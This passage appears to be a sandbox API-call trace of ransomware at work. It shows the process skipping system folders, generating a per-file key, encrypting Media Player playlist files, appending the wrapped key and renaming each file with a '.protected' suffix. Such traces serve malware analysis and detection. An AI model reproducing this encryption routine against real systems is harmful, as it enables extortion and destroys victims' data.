(lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0084.945] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 
137 [0084.945] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0084.945] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 137 [0084.945] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0084.945] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0084.946] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.946] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0084.946] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.946] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.946] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.946] CloseHandle (hObject=0x158) returned 1 [0084.947] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.protected") returned 147 [0084.947] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl.protected")) returned 1 [0084.947] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0084.947] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0084.947] StrStrIW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0084.948] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.948] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.948] CryptEncrypt (in: hKey=0x444cf8, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0084.948] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0084.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0084.948] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0084.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0084.948] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0084.949] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0084.950] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.950] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, 
nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0084.950] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.950] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.950] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.950] CloseHandle (hObject=0x158) returned 1 [0084.950] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.protected") returned 145 [0084.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0084.952] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.952] lstrcmpiW 
(lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Windows") returned -1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0084.952] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0084.952] StrStrIW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0084.952] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.952] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.952] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0084.953] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0084.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0084.953] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0084.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0084.953] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0084.953] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0084.954] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.954] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0084.955] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.955] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.955] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, 
lpOverlapped=0x0) returned 1 [0084.955] CloseHandle (hObject=0x158) returned 1 [0084.955] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.protected") returned 148 [0084.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl.protected")) returned 1 [0084.956] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Windows") returned -1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0084.956] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0084.956] StrStrIW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0084.956] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.956] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.956] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.956] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0084.956] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0084.956] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0084.956] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0084.956] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0084.956] StrStrW 
(lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0084.956] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0084.957] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.957] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0084.958] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.958] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.958] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.958] CloseHandle (hObject=0x158) returned 1 [0084.958] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.protected") returned 150 [0084.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync 
playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl.protected")) returned 1 [0084.958] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.958] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0084.958] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0084.959] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0084.959] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0084.959] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0084.959] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0084.959] StrStrIW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0084.959] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.959] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.959] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0084.962] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0084.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0084.962] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0084.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0084.962] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0084.962] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0084.963] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.963] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0084.963] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.963] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.963] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.963] CloseHandle (hObject=0x158) returned 1 [0084.963] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.protected") returned 145 [0084.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl.protected")) returned 1 [0084.964] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Windows") returned -1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files") returned -1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", 
lpString2="Program Files (x86)") returned -1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="$Recycle.bin") returned 1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="System Volume Information") returned -1 [0084.964] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0084.964] StrStrIW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".protected") returned 0x0 [0084.964] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.964] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.964] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.964] CreateFileW 